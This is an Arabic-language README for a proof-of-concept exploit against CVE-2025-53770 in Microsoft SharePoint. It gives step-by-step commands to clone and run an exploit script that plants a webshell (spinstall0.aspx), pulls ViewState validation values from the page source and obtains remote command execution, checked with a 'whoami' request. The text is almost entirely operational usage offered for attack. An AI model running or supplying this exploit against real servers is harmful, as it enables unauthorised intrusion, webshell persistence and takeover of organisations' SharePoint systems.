
استغلال PoC لـ CVE-2025-53770 يتيح رفع webshell إلى SharePoint، واستخراج ValidationKey، وإنشاء ViewState موقّع، وتنفيذ التعليمات البرمجية عن بُعد عبر قشرة عكسية أو مرتبطة.
تتيح هذه الحزمة:
git clone <this-repo>
cd toolshell-exploit
pip3 install -r requirements.txt
قم برفع الـ webshell
من صفحة SharePoint يمكنك الوصول إلى مصدر الصفحة. فقط انتقل إلى تبويب عرض المصدر، ومن هناك إذا كان متاحًا ستحصل على ما يلي، وهو ما يمكنك نسخه:
A) __VIEWSTATEGENERATOR
B) __EVENTVALIDATION
C) (أي __VIEWSTATE حالي للسياق)
python3 toolshell_exploit.py \
--target https://sharepoint.local \
--viewstate "<any_BASE64_VIEWSTATE>" \
--generator "<VIEWSTATEGENERATOR>" \
--eventval "<EVENTVALIDATION>"
يقوم هذا برفع spinstall0.aspx. تحقق: https://sharepoint.local/_layouts/15/spinstall0.aspx?cmd=whoami